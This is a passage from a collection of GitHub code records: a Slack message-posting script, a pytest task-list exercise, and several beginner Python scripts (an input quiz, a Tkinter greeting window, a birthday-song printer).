res = get_match_index('zaz', 34)\nprint(res)\n\n# def get_ordered_fields(fields, cls_def):\n# new_fields = OrderedDict()\n# for k, v in\n","repo_name":"neurobin/python-morm","sub_path":"tests/testd.py","file_name":"testd.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"11697446443","text":"# API info: https://pypi.org/project/slackclient/\n# pip install slackclient\nfrom slackclient import SlackClient\nimport argparse\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Push Notificator with Slack by Mario Parreño, MSc student, Universidad Politecnica de Valencia, maparla@inf.upv.es. Enjoy!')\n parser.add_argument('--slack_token', type=str, required=True, help='The Slack API token.')\n parser.add_argument('--msg', type=str, required=True, help='The message to send.')\n parser.add_argument('--channel', type=str, default='log_ai', help='The slack channel where we send the message.')\n args = parser.parse_args()\n return args.slack_token, args.msg, args.channel\n\nslack_token, msg, channel = parse_args()\n\ndef slack_message(slack_token, message, channel):\n sc = SlackClient(slack_token)\n sc.api_call('chat.postMessage', channel=channel,\n text=message, username='My Sweet Bot',\n icon_emoji=':robot_face:')\n\nslack_message(slack_token, msg, channel)\n","repo_name":"MarioProjects/Python-Slack-Logging","sub_path":"slack_sender.py","file_name":"slack_sender.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"9992941392","text":"import pytest\nfrom datetime import date, timedelta\nfrom calendars import CalendarStub\nfrom tasks import Task, TaskList\n\n\ndef test_creation():\n # Arrange\n today = date(2000, 1, 1)\n calendar = CalendarStub(today)\n\n # Act\n sut = TaskList(calendar)\n\n # Assert\n assert 0 == len(sut)\n assert [] == sut.due_tasks\n assert [] == sut.overdue_tasks\n assert [] == sut.finished_tasks\n\n\ndef test_adding_task_with_due_day_in_future():\n # Arrange\n today = date(2000, 1, 1)\n tomorrow = today + timedelta(days=1)\n calendar = CalendarStub(today)\n task = Task('description', tomorrow)\n sut = TaskList(calendar)\n\n # Act\n sut.add_task(task)\n\n # Assert\n assert 1 == len(sut)\n assert [task] == sut.due_tasks\n\n\ndef test_adding_task_with_due_day_in_past():\n # Arrange\n today = date(2000, 1, 1)\n yesterday = today - timedelta(days=1)\n calendar = CalendarStub(today)\n task = Task('description', yesterday)\n sut = TaskList(calendar)\n\n # Act/Assert\n with pytest.raises(RuntimeError):\n sut.add_task(task)\n assert 0 == len(sut)\n\n\ndef test_task_becomes_overdue():\n # Arrange\n today = date(2000, 1, 1)\n tomorrow = today + timedelta(days=1)\n next_week = today + timedelta(weeks=1)\n calendar = CalendarStub(today)\n task = Task('description', tomorrow)\n sut = TaskList(calendar)\n sut.add_task(task)\n\n # Act\n calendar.today = next_week\n\n # Assert\n assert [task] == sut.overdue_tasks\n\n\ndef test_task_becomes_finished():\n # Arrange\n today = date(2000, 1, 1)\n tomorrow = today + timedelta(days=1)\n calendar = CalendarStub(today)\n task = Task('description', tomorrow)\n sut = TaskList(calendar)\n sut.add_task(task)\n\n # Act\n task.finished = True\n\n # Assert\n assert [] == sut.due_tasks\n assert [task] == sut.finished_tasks\n","repo_name":"UCLL-PR2/exercises","sub_path":"06-testing/09-arrange-act-assert/solution/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"29699800696","text":"# Problem - read one sentence from the user and print it back.\n\n# print(\"\"\"Please enter a sentence : \"\"\", end = \" \")  # a string can also be passed directly to input()\n\nname = input(\"Please enter your name : \")\nprint(name)\n\n# Follow-up - an elementary-school level math problem\n\n
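# input() returns a string, so the answer is compared with the string '2',\n# not the integer 2\n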
while True:\n a = input('What is 1 plus 1? : ')\n\n if a != '2':\n print('{}, are you perhaps a preschooler?'.format(name))\n continue\n else:\n print('Correct')\n break","repo_name":"kingssik/Practice_Python","sub_path":"Quiz_input_1.py","file_name":"Quiz_input_1.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27106503504","text":"from tkinter import *\r\n\r\njanela = Tk()\r\n\r\ntitulo = Label(\r\n text = 'My first graphical interface',\r\n fg = 'red',\r\n bg = 'black'\r\n)\r\n\r\nnome = Label(text = 'Write your name')\r\n\r\nentrada = Entry(background='red', fg='black')\r\n\r\ndef limpar():\r\n entrada.delete(0, END)\r\n\r\ndef imprimir_saudacao():\r\n print(f'''\r\n Hello, welcome\r\n {entrada.get()}!\r\n ''')\r\n limpar()\r\n\r\nenviar = Button(text='Send', fg='red', bg='black', width=50, command=imprimir_saudacao)\r\n\r\n\r\ntitulo.pack(pady=100)\r\nnome.pack(side='left')\r\nentrada.pack(side='right')\r\nenviar.pack(side='bottom')\r\n\r\njanela.mainloop()","repo_name":"pspellegrini/infinityschool","sub_path":"Py/Aula 09 - Tkinter/tkinter_2.py","file_name":"tkinter_2.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28164585585","text":"# Asks for the user's name\ninputName = input(\"Whose birthday is it?\\t\")\n\ndef birthday_song(usedName):\n # Prints out the song using the name\n song = f\"Happy birthday to you!\\nHappy birthday to you!\\nHappy birthday dear {usedName}!\\nHappy birthday to you!\"\n print(song)\n\n# Uses the name entered at the beginning\nbirthday_song(inputName)","repo_name":"roagan796/Principles-of-CS-Period-1","sub_path":"Wolf_3.02.py","file_name":"Wolf_3.02.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}